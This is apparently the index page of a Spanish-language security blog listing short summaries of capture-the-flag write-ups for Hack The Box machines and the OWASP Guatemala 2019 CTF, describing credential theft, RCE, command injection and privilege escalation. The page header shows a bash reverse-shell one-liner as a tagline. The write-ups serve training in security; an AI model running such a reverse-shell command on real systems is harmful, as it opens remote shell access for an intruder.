sckull - blog
bash -i >& /dev/tcp/localhost/1337 0>&1
Hack The Box - Querier
· ✍️ sckull
smbclient binwalk mssql impacket powerup
Querier es una maquina de HackTheBox, descubrirmos credenciales en una coneccion de base de datos SQL Server dentro de los macros de Excel (xlsm) lo que nos dio acceso a la base de datos mediante un script de Impacket y que posteriormente nos permitio realizar Out-of-Band para obtener las credenciales, este ultimo nos permitio ejecutar una shell inversa. Tras ejecutar PowerUp encontramos credenciales las cuales utilizamos en PSexec para obtener privilegios de administrador.
Hack The Box - Querier
Hack The Box - Chaos
· ✍️ sckull
wpscan webmin imap pdfTEXT laTex DNS exfil tar firefox
Chaos expone WordPress donde desbloqueamos un post con informacion de WPScan, dicho post presenta credenciales que nos dieron acceso al puerto IMAP, encontramos un correo encriptado el cual nos guió a pdfTEXT (LaTex) donde explotamos un RCE y escapamos de una shell limitada. Contraseñas guardadas en el directorio Firefox nos permitió escalar privilegios.
Hack The Box - Chaos
OWASP CTF 2019 Guatemala - Infraestructura
· ✍️ sckull
OWASP CTF es una maquina del OWASP Guatemala, aqui encontrarás la solucion para obtener la flag user.txt y root.txt de las diferentes maquinas Windows y Linux presentadas por los organizadores.
OWASP CTF 2019 Guatemala - Infraestructura
OWASP CTF 2019 Guatemala - Writeup
· ✍️ sckull
OWASP CTF es una serie de retos del OWASP Guatemala, aqui encontrarás la solucion para obtener las flags de los diferentes retos presentados por los organizadores.
OWASP CTF 2019 Guatemala - Writeup
Hack The Box - Lightweight
· ✍️ sckull
capabilities tcpdump openssl
Nos topamos con un registro de IPs que nos dio acceso por SSH, con tcpdump obtuvimos credenciales que usamos en SSH. Cambiamos al siguiente usuario tras crackear la contraseña encontrada en una conexion de LDAP. Realizamos la lectura de la flag root utilizando openssl.
Hack The Box - Lightweight
Hack The Box - Irked
· ✍️ sckull
UnrealIRC metasploit steganography steghide suid
Irked tiene expuesto el puerto de UnrealIRCd el cual tiene un backdoor, lo que nos dio acceso a la maquina. El siguiente usuario lo obtuvimos por medio de un reto de Esteganografia. Escalamos privilegios mediante un fichero el cual ejecutaba un script donde agregamos una shell inversa.
Hack The Box - Irked
Hack The Box - Teacher
· ✍️ sckull
moodle Evil Teacher cron
Encontramos credenciales en un fichero y con burpsuite obtuvimos el caracter faltante para acceder a Moodle. Explotamos una vulnerabilidad en Moodle lo que nos dio acceso, y que con credenciales de la base de datos de esta plataforma accedimos a un segundo usuario crackeando los Hashes encontrados. Obtuvimos la flag root creando un link simbolico.
Hack The Box - Teacher
Hack The Box - RedCross
· ✍️ sckull
sqli sqlmap command injection rce
En RedCross realizamos una enumeracion a un subdominos donde encontramos una funcion de la aplicacion web que nos permite crear un acceso temporal por SSH a una shell limitada, dentro de los parametros de esta accion descrita realizamos Command Inyeccion lo que nos dio acceso aun primer usuario. Finalmente tomamos ventaja de una funcionalidad de la aplicacion para agregar un usario y obtener acceso root.
Hack The Box - RedCross